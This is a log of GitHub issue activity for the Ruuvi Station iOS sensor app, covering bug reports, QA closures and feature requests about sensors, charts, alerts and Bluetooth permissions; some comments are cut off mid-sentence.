[2022-10-18 05:37] markoaamunkajo commented on #1103
QA passed

[2022-10-18 05:37] #1103 closed

[2022-10-18 05:46] markoaamunkajo commented on #827
QA passed

[2022-10-18 05:46] #827 closed

[2022-10-18 09:52] sini-maaria commented on #1001
They still don't seem to fit the row. Of course this is close enough, but if it is not a big task, please make them a bit smaller.

<img width="563" alt="Screenshot 2022-10-18 at 12 48 17" src="https://user-images.githubusercontent.com/19531763/196397232-4d540c5f-b954-40de-a687-64b549ccbe6d.png">

[2022-10-18 18:12] priyonto commented on #1001
I think it's because of the icon size/aspect ratio. Mostly the height is clipped a little on the top. If we make the height smaller, the icons will look quite small on the larger models like Pro Max one.

[2022-10-18 18:23] priyonto opened #1104 "Build project on Xcode 14"

[2022-10-18 20:20] DG12 commented on #1001
Spreading  them a little farther apart would be helpful.

[2022-10-19 01:45] markoaamunkajo opened #1108 "Disconnecting sensor refused"
Description:

1.3.0(319)

I have local sensor that has other owner than my current cloud account.
I am trying to disconnect sensor in sensor settings page to release it but it refuses to release. Only way to do it is to kill the app.

https://user-images.githubusercontent.com/50437378/196577493-0fc7cd9c-8646-4aa8-bf22-5e239da9be2f.mov

[2022-10-19 05:48] #1001 closed

[2022-10-23 16:10] priyonto commented on #941
Closing as completed.

[2022-10-23 16:10] #941 closed

[2022-10-23 18:17] priyonto commented on #1102
I have investigated this for a couple of hours. I noticed a decrease in performance for sure but the charts load normally for me in different conditions like opening the app from the background, from the inactive state, or when in the foreground with the settings page open.

The issue for me was sliding the card was not happening smoothly. And based on the performance benchmarking it seems that's

[2022-10-25 00:45] DG12 commented on #1093
Closed in 319

[2022-10-25 00:45] #1093 closed

[2022-10-25 00:56] DG12 opened #1109 "After aborting synchronization sync again completes instantly without data 2.2.0(376) - defect"
Attempt to sync to 450A in the swamp.
RSSI very low. -99 to -96 ( No I cannot get any closer it's flooded)
see previous photos at [MyBeacons.info/swampFlood](http://mybeacons.info/swampFlood.html)

Get advertisements only every every 2-3 minutes,
Tap sync. App reports synchronizing but nothing further.
Presents cancel Botton which I tapped on.

At this point issuing another sync completes instantl

[2022-10-26 02:54] markoaamunkajo commented on #1088
QA passed

[2022-10-26 02:54] #1088 closed

[2022-10-26 17:44] priyonto commented on #1102
Closing this one. Will follow up this issue on #1078

[2022-10-26 17:44] #1102 closed

[2022-10-27 03:07] laurijamsa commented on #1004
It may be that the issue https://github.com/ruuvi/com.ruuvi.station.ios/issues/1070 was the problem here. But I'll keep this issue self-assigned and will try to reproduce the problem before closing.

[2022-10-27 03:46] markoaamunkajo opened #1113 "Inactive alert setting is reset when user signs into iOS app"
Decription:

User has station.ruuvi.com open and has set some alerts in Webapp but not set them active.
User then signs into Ruuvi Cloud on his iPhone app and syncs with cloud.

Actual: inactive alert settings are reset to defaults
Expected: looks like set only on Webapp these settings are stored so they should be also synced to iOS app

https://drive.google.com/file/d/1fpU-b69exk6CVo0UvpXYzSlIJDV

[2022-10-27 04:23] laurijamsa commented on #860
Opened a feature request topic and closing this issue.

https://f.ruuvi.com/t/sharing-a-sensor-that-hasnt-recently-been-nearby-a-ruuvi-gateway/5858

[2022-10-27 04:23] #860 closed

[2022-10-27 06:16] markoaamunkajo commented on #1108
QA passed

[2022-10-27 06:16] #1108 closed

[2022-10-27 07:36] ojousima opened #1114 "Support contesting sensor ownership"
Users should have a "Force claim" button that lets them claim ownership of a sensor they have physical access to.
Api proposal is documented here: https://docs.ruuvi.com/communication/cloud/user-api#contest-ownership-of-a-sensor-proposal Plan is to implement the API on second half of November on Cloud side.

The sector can be read from Device information service over GATT after button press or NFC

[2022-10-27 07:54] ojousima opened #1115 "Support claiming subscriptions, show subscription details"
Users should be able to claim their subscription codes and check their subscription status through app. There is no specific deadline for this issue, users can use Web app until this is ready

https://docs.ruuvi.com/communication/cloud/user-api#get-subscription-history

[2022-10-28 17:54] priyonto opened #1117 "Update GRDB to the latest version and update Ruuvi Reactor module accordingly"

[2022-10-28 17:56] #1104 closed

[2022-10-29 17:02] DG12 opened #1119 "Tag where most recent data is old shows no chart or error (320) - minor"
![image](https://user-images.githubusercontent.com/2365961/198843965-f59b2a6e-bb3e-4960-82b8-1762300a64aa.png)
![image](https://user-images.githubusercontent.com/2365961/198844070-7e6fba90-97a0-4947-8211-997dbe03f441.png)

[2022-10-31 17:44] priyonto opened #1121 "Advertisements dropping points"
More about this on #1085

[2022-10-31 17:46] priyonto commented on #1085
I am closing this card since the original issue is fixed. I have created #1121 to work on the newly reported issue.

[2022-10-31 17:46] #1085 closed

[2022-10-31 19:37] ojousima opened #1122 "Alerts are not throttled"
Please see https://github.com/ruuvi/ruuvi-network-serverless/issues/238, since this is popups in app my guess is that this is iOS and not backend related?

[2022-10-31 19:41] priyonto commented on #1122
Thanks. This seems like an iOS issue. I will work on that.

[2022-11-02 06:52] laurijamsa commented on #1058
Closed Android's similar issue and will close this one too. https://github.com/ruuvi/com.ruuvi.station/issues/772

We're aiming to add a highlight color on the the upcoming dashboard new layout too. Also Android's updated sensor settings page is aimed to be implemented on the iOS too.

[2022-11-02 06:52] #1058 closed

[2022-11-05 20:53] priyonto commented on #1117
The upgrade will require breaking changes to the app architecture, which is not necessary at this moment. The threading issues are sorted. Closing this one. Will perhaps revisit it if required at some point.

[2022-11-05 21:06] DG12 commented on #893
Example: when starting up [station.ruuvi.com](http://station.ruuvi.com/), entering a username , without waiting for the email enter a b c d  it INCORRECTLY reports "Code used or expired".

Waiting for the email, which sometimes (for me) takes several minutes, and entering the correct code it reports 'Unauthorized request.'

**Localization issue**
I cannot find these strings in either the master or

[2022-11-05 21:21] priyonto commented on #1119
iOS app stores only the last 10 days of data. If the last measurement is older than 10 days there will be no chart. However, a message showing no data available will be presented instead.

[2022-11-06 20:29] priyonto commented on #1122
Failed to reproduce it on my end.

@markoaamunkajo Please check on your end too. Will close if we can't reproduce it.

[2022-11-07 06:47] laurijamsa opened #1127 "Appstore description update"
We just agreed with Sini-Maaria that she'll prepare new screenshot. Assigning English & Finnish descriptions to Marko.

Android issue: https://github.com/ruuvi/com.ruuvi.station/issues/498

[2022-11-08 04:53] laurijamsa opened #1128 "Never hide fw updating option on sensor settings"
We have mutually agreed that hiding the option to try out updating sensor's firmware causes more troubles than it gives benefit to users. So, let's show it in ALL scenarios and never hide it.

[2022-11-08 09:30] markoaamunkajo commented on #1122
I cannot reproduce with AppStore version. Moving this to done without findings.

[2022-11-08 09:30] #1122 closed

[2022-11-08 10:47] laurijamsa commented on #1063
I think we don't need to support downgrading from dev builds, so this issue can be closed. If you think that the problem is something else, please let us know.

[2022-11-08 10:47] #1063 closed

[2022-11-08 10:50] #1056 closed

[2022-11-08 10:54] laurijamsa commented on #1067
This isn't an iOS issue. We'll consider the wording on https://github.com/ruuvi/station.localization/blob/dev/station.localization.json and may make changes later on. Closing.

[2022-11-08 10:54] #1067 closed

[2022-11-08 10:56] laurijamsa commented on #1055
This is an ok idea and we've discussed about it multiple times in our meetings. So far, we've decided not to show success messages. But error messages could be shown. Closing this issue and will open a new one later once we decide that we'll proceed with this on Android+iOS.

[2022-11-08 10:56] #1055 closed

[2022-11-08 10:57] laurijamsa commented on #1037
The latest builds have enhancements on these things. Closing this one. Please let us know if you notice similar issues in the future.

[2022-11-08 10:57] #1037 closed

[2022-11-08 10:58] laurijamsa commented on #1047
This has been implemented on Android already. Same design will be migrated to iOS too. Closing this issue.

[2022-11-08 10:58] #1047 closed

[2022-11-08 19:14] priyonto opened #1131 "Show full firmware version number including the variant"

[2022-11-09 18:29] priyonto opened #1134 "Move the sharee list fetching on background in share screen"

[2022-11-09 18:54] priyonto commented on #1065
I have tested it in an average connection, and it looks like it is working as expected.
But, I can think of a couple of reasons why it was happening to you.

1. The network was not consistently reliable but you mentioned it was good.
2. You had a good amount of cloud sensors added to your account. When a user logs in, all the cloud sensors alongside 10 days of history are fetched and stored on the

[2022-11-09 18:55] priyonto commented on #1065
@markoaamunkajo Please check on your end, if it's not reproducible please close it.

[2022-11-10 01:21] DG12 commented on #1065
Best connection ever at -50dBm.
Anyway closing until it happens again.

[2022-11-10 01:21] #1065 closed

[2022-11-10 03:03] markoaamunkajo opened #1135 "iOS settings requests should have button to Settings"
Description:

Please check any iOS settings requests that have buttons that they have ability to forward user to iOS Settings page

For example, for Bluetooth we use permission prompt and it be denied with Don't Allow button. The next time user is shown popup to go to iOS Settings with OK button.

Expected:
Use Settings button with link to Settings instead

![IMG_D9247D9A756C-1](https://user-image

[2022-11-10 03:08] markoaamunkajo opened #1136 "Show Bluetooth permission when tap on SCAN button"
Description:

Bluetooth permission is shown currently during onboarding and especially if user waits on onboarding screens it may even be shown on the first page.

![IMG_0097](https://user-images.githubusercontent.com/50437378/200991064-1cbdd1a0-4312-4d29-987b-940153800250.PNG)

Expected:
Request permission when pressing SCAN button on last onboarding, not before that.

[2022-11-10 03:24] markoaamunkajo opened #1137 "Add Buy Ruuvi Sensors button to Add a New Sensor page"
Description:

Let's add Buy Ruuvi Sensors button to bottom of Add a New Sensor page same as on Android

Remember to use correct URL's according to Language

![buybutton](https://user-images.githubusercontent.com/50437378/200993262-22bccffc-3139-45ca-8477-402335ec82aa.jpg)

[2022-11-10 03:33] markoaamunkajo commented on #1101
@priyonto looks like we are hiding this menu item when there are no sensors added to Ruuvi Station. Let's not hide it in any situation.

![background_menu](https://user-images.githubusercontent.com/50437378/200994348-039ada3b-119a-4d77-9800-9a020f22839f.jpg)

[2022-11-10 03:48] markoaamunkajo opened #1138 "Data Logging Interval collection in connected mode"
Background scanning interval, question about data collecting

Please confirm that background scanning Data Logging Interval is followed on all Ruuvi tags that are in connected mode.
In example: Data Logging interval is enabled and data is requested from Ruuvi Tags ONLY in selected intervals.

Previously we were listening to all heartbeats and it was resource heavy for battery on both Ruuvi Tag and

[2022-11-10 04:01] markoaamunkajo opened #1139 "Use long version text for Keep Connection popup"
Description:

Currently we use two versions for asking user if he wants to keep connection on sensor card

Cards.KeepConnectionDialog.message
Cards.KeepConnectionDialog.Settings.message

These are launched from different action (chart icon, sensor settings icon)

Expected:
Use Cards.KeepConnectionDialog.message for both

![dialog](https://user-images.githubusercontent.com/50437378/200997572-35e9a0

[2022-11-10 04:19] markoaamunkajo commented on #1022
@priyonto This is implemented and works on Android, let's add it to iOS too. Make sure it works exactly same as in Android:
When sensor is already claimed by another user don't even let user to access claim sensor page and check and show owner email immediately.

[2022-11-10 04:20] laurijamsa commented on #937
We're not going to implement this but instead will create sound alerts: https://github.com/ruuvi/com.ruuvi.station.ios/issues/1100

Closing this one.

[2022-11-10 04:20] #937 closed

[2022-11-12 03:37] laurijamsa commented on #1068
We haven't been able to reproduce. Please let us know if you can reproduce this issue with the latest builds.

[2022-11-12 03:37] #1068 closed

[2022-11-12 04:33] laurijamsa commented on #902
We're about to open another issue about not hiding alerts in any circumstances. Closing this one as a duplicate.

[2022-11-12 04:33] #902 closed

[2022-11-12 04:37] laurijamsa commented on #1069
Can you reproduce this with the latest build? So far, we haven't seen this problem. If you can, could you please share a video?

[2022-11-12 04:58] markoaamunkajo opened #1140 "Connection and cascaded alerts in sensor settings"
Description:

1. Currently if user is in connected mode we hide Connection and Alerts sections from Sensor Settings if user has added same sensor on another iOS Ruuvi Station. We also show Very Old under Firmware on another Ruuvi Station because of this.

Let's instead keep them visible and show information for user why alerts or connection is not available when trying to enable pairing.

2. Casca

[2022-11-12 16:41] priyonto commented on #1138
As far as I can understand, it's still the same. And, I think that's the whole point of connecting the tag so that we can have the measurements when the app is in the background and trigger alerts.

At this moment- the data logging interval means the interval to store data in the database, not the interval of getting data from the RuuviTag. We are pinging the RuuviTag for measurement all the time,

[2022-11-12 17:06] priyonto commented on #1140
@markoaamunkajo The message seems not right to me.

// Only one iOS device can be paired to Ruuvi Station at a time// - is that correct? Should it be RuuviTag instead of Ruuvi Station?

[2022-11-13 01:21] laurijamsa commented on #1140
Correct. Shouldn't be Ruuvi Station. Use "Ruuvi sensor" instead.

[2022-11-13 12:16] laurijamsa commented on #1140
my suggestion to show the connection status:

![image](https://user-images.githubusercontent.com/1311912/201521195-08054e35-7b6f-4bc2-9b1b-b998c8c72c94.png)

The "..." would be repeated like ., .., ... so that user knows it is still trying to do something and didn't die. Timeout could be 10 sec and if timeouting, show the fail popup.

[2022-11-15 01:56] DG12 opened #1143 "App presents nice chart, then no-data chart, then nice chart, then no-data chart,..."
When app is very slow presenting chart, anxious user taps thermometer location several times seconds apart.  After xx seconds the chart is presented. After yy seconds a blank chart is presented. This repeats.

Is it possible that these taps are buffered such that when chart finally finished it starts over

[2022-11-15 10:01] hakunti commented on #1137
Can we add this UTM tag to the link: ?utm_campaign=app_ua&utm_medium=referral&utm_source=ios